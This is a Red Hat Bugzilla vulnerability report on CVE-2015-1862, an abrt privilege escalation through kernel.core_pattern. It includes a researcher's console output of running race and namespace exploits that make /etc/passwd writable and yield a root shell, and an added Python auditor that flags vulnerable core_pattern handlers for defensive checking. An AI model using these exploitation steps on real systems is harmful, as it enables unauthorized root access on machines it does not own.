Bug 1211223 (CVE-2015-1862)
Summary: CVE-2015-1862 abrt: local privilege escalation through kernel.core_pattern
Product: [Other] Security Response
Component: vulnerability
Status: CLOSED NOTABUG
Severity: high
Priority: high
Version: unspecified
Target Milestone: ---
Target Release: ---
Hardware: All
OS: Linux
Whiteboard:
Fixed In Version:
Doc Type: Bug Fix
Doc Text: A flaw was found in the way certain ABRT core handlers processed crash reports in a namespaced environment. A local, unprivileged user could use this flaw to escalate their privileges on the system.
Story Points: ---
Clone Of:
Environment:
Last Closed: 2015-07-09 05:38:34 UTC
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---
Target Upstream Version:
Embargoed:
Bug Depends On:
Bug Blocks: 1211224, 1214172

Reporter: Vasyl Kaigorodov <vkaigoro>
Assignee: Red Hat Product Security <security-response-team>
QA Contact:
Docs Contact:
CC: aavati, bressers, fweimer, mjc, nlevinki, pablo.iranzo, pasteur, pneedle, rfortier, security-response-team, smohan, ssaha, taviso, vbellur
Keywords: Security
Description
Vasyl Kaigorodov
2015-04-13 10:58:26 UTC
It's not obvious to me that abrt in RHEL7 is not affected, are you sure? I installed a default RHEL 7.1 Workstation in a VM, ran the exploit and it worked.

    [taviso@localhost ~]$ gcc raceabrt.c -o /tmp/raceabrt
    [taviso@localhost ~]$ /tmp/raceabrt /etc/passwd
    Detected ccpp-2015-04-14-20:09:32-15116.new, attempting to race...
    Didn't win, trying again!
    [snip lots of output]
    Didn't win, trying again!
    Detected ccpp-2015-04-14-20:09:44-15493.new, attempting to race...
    Didn't win, trying again!
    Detected ccpp-2015-04-14-20:09:44-15499.new, attempting to race...
    Exploit successful...
    -rw-r--r--. 1 taviso abrt 2066 Apr 14 13:02 /etc/passwd
    [taviso@localhost ~]$ cat /etc/redhat-release
    Red Hat Enterprise Linux Workstation release 7.1 (Maipo)

In case it isn't obvious, you can easily turn this into a root shell like this:

    $ getent passwd taviso
    taviso:x:1000:1000:Tavis Ormandy:/home/taviso:/bin/bash
    $ vi /etc/passwd
    $ getent passwd taviso
    taviso:x:0:0:Tavis Ormandy:/home/taviso:/bin/bash
    $ su taviso
    Password:
    # id
    uid=0(root) gid=0(root) groups=0(root)
    exit

The issue raised in comment #3 and comment #4 is a different vulnerability, not CVE-2015-1862. It is currently under investigation.

Further clarification on previous comments:

Various flaws were discovered with abrt in Red Hat Enterprise Linux and Fedora. These were initially discussed on the closed vendors list called linux-distros, before being made public. Initially a flaw related to namespaces/chroot support in abrt was discussed and was assigned CVE-2015-1862. This bug relates to that particular CVE/flaw. As mentioned above, since namespaces/chroot support in abrt does not exist in Red Hat Enterprise Linux and Fedora, these products are not affected by CVE-2015-1862. Later, various other flaws were discussed on the list; these flaws were not assigned CVEs and it was suggested to discuss them via the open list, oss-security.

These various other flaws are tracked via the following bug:
https://bugzilla.redhat.com/show_bug.cgi?id=1211835
http://www.openwall.com/lists/oss-security/2015/04/14/4

These additional flaws (tracked via bug 1211835) have been rated as having Important impact for Red Hat Enterprise Linux 7, as they can lead to privilege escalation to root (from a non-root local user), and Moderate impact for Red Hat Enterprise Linux 6, since they can lead to privilege escalation to root only from the abrt user.

Statement:

Not vulnerable. This issue does not affect the version of the abrt package as shipped with Red Hat Enterprise Linux 6 and 7. Additional information about this is available at https://bugzilla.redhat.com/show_bug.cgi?id=1211223#c7

Thanks for the clarification, however I'm also confused about the statement "No version of Red Hat Enterprise Linux or Fedora ships abrt with the above vulnerable code", isn't Fedora 20 still supported?

    $ rpm -qf /usr/libexec/abrt-hook-ccpp
    abrt-addon-ccpp-2.2.2-1.fc20.x86_64
    $ cat /etc/fedora-release
    Fedora release 20 (Heisenbug)
    $ sysctl kernel.core_pattern
    kernel.core_pattern = |/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e

And the exploit works:

    $ gcc newpid.c -o test -static
    newpid.c:17:3: warning: #warning this file must be compiled with -static [-Wcpp]
     # warning this file must be compiled with -static
       ^
    $ ./test
    uid=0(root) gid=1000(taviso) groups=0(root),10(wheel),18(dialout),987(wireshark),1000(taviso) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
    sh-4.2#

Please note: Fedora 20 is now EOL and will not be patched for any flaws. Closing this flaw.
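The thread turns on what kernel.core_pattern contains: the Fedora 20 value quoted above pipes every core dump to a root-run handler that first chroots into /proc/%P/root, the crashing process's own root, while the RHEL builds lack that chroot step. The following auditor is an added example written for this page; it is not code from the bug report or from the abrt project. It parses a core_pattern value as core(5) defines it (a leading "|" means the kernel pipes the core to a handler; %P is the crashing process's PID in the initial PID namespace, %p its PID in its own namespace) and flags a handler that chroots into the crasher's root. The function and field names, and the two variant sample patterns beside the Fedora 20 one, are this example's own constructions.

```python
"""Audit a kernel.core_pattern value for a root-run core handler that chroots
into the crashing process's root (the handler shape discussed in bug 1211223).
Added example; not from the bug report or from abrt.
"""
import re
import shlex
from dataclasses import dataclass, field
from typing import List, Optional

CORE_PATTERN_FILE = "/proc/sys/kernel/core_pattern"

# The value quoted from Fedora 20 in the thread, plus two constructed variants
# used only to exercise the parser (not values observed on any real system).
FEDORA20_PATTERN = ("kernel.core_pattern = |/usr/sbin/chroot /proc/%P/root "
                    "/usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e")
PIPED_NO_CHROOT = "|/usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e"   # constructed
PLAIN_FILE = "core.%p"                                                 # constructed


@dataclass
class CorePatternReport:
    pattern: str
    piped: bool                     # kernel hands the core to a user-space handler
    handler: Optional[str]          # program that finally receives the core, if piped
    chroot_target: Optional[str]    # argument of a leading chroot(1), if any
    chroots_into_crasher_root: bool
    specifiers: List[str] = field(default_factory=list)
    findings: List[str] = field(default_factory=list)


def parse_core_pattern(value: str) -> CorePatternReport:
    """Accepts either the raw /proc file contents or `sysctl kernel.core_pattern` output."""
    raw = value.strip()
    if raw.startswith("kernel.core_pattern"):
        raw = raw.split("=", 1)[1].strip()
    piped = raw.startswith("|")
    argv = shlex.split(raw[1:]) if piped else []
    specifiers = re.findall(r"%[A-Za-z%]", raw)  # %-specifiers the kernel expands

    handler: Optional[str] = None
    chroot_target: Optional[str] = None
    if piped and argv:
        # A leading chroot(1) changes root before the real handler runs.
        if argv[0].rsplit("/", 1)[-1] == "chroot" and len(argv) >= 3:
            chroot_target = argv[1]
            handler = argv[2]
        else:
            handler = argv[0]

    # /proc/%P/root (or /proc/%p/root) resolves to the crashing process's root.
    into_crasher_root = bool(
        chroot_target and re.fullmatch(r"/proc/%[pP]/root/?", chroot_target)
    )

    findings: List[str] = []
    if piped:
        findings.append("core is piped to a handler run by the kernel as root: %s" % handler)
    if into_crasher_root:
        findings.append(
            "handler chroots into %s, the crashing process's own root, before running"
            " (the namespace/chroot handling bug 1211223 concerns)" % chroot_target
        )
    return CorePatternReport(raw, piped, handler, chroot_target,
                             into_crasher_root, specifiers, findings)


def read_core_pattern(path: str = CORE_PATTERN_FILE) -> str:
    """Read the live value; only meaningful on a Linux host."""
    with open(path) as f:
        return f.read()


if __name__ == "__main__":
    for sample in (FEDORA20_PATTERN, PIPED_NO_CHROOT, PLAIN_FILE):
        report = parse_core_pattern(sample)
        print(report.pattern)
        for line in report.findings or ["no piped handler; core is written to a file"]:
            print("  -", line)
```

Run against the live value with `parse_core_pattern(read_core_pattern())`; a report whose `chroots_into_crasher_root` is true identifies the Fedora 20 shape, while a plain piped handler without the chroot step is the RHEL shape the thread describes as not affected by CVE-2015-1862 (but still subject to the separate flaws tracked in bug 1211835).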